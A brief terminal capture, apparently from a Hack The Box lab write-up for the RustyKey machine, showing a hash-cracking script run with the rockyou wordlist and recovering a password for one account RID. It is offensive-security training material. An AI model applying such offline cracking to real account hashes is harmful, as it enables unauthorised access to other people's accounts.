└─$ python3 timecrack.py ~/shared/HTB/Machines/RustyKey/rustykey.hashes /usr/share/wordlists/rockyou.txt
[*] Starting password cracking...

Cracking:  74%|█████████████▍    | 10665253/14344392 [06:03<02:04, 29615.66pw/s][+] Cracked RID 1125 password: Rusty88!
Cracking: 100%|██████████████████| 14344392/14344392 [08:21<00:00, 28589.92pw/s]

[*] Cracking complete: 1 password(s) recovered.

Relevant Boxes :
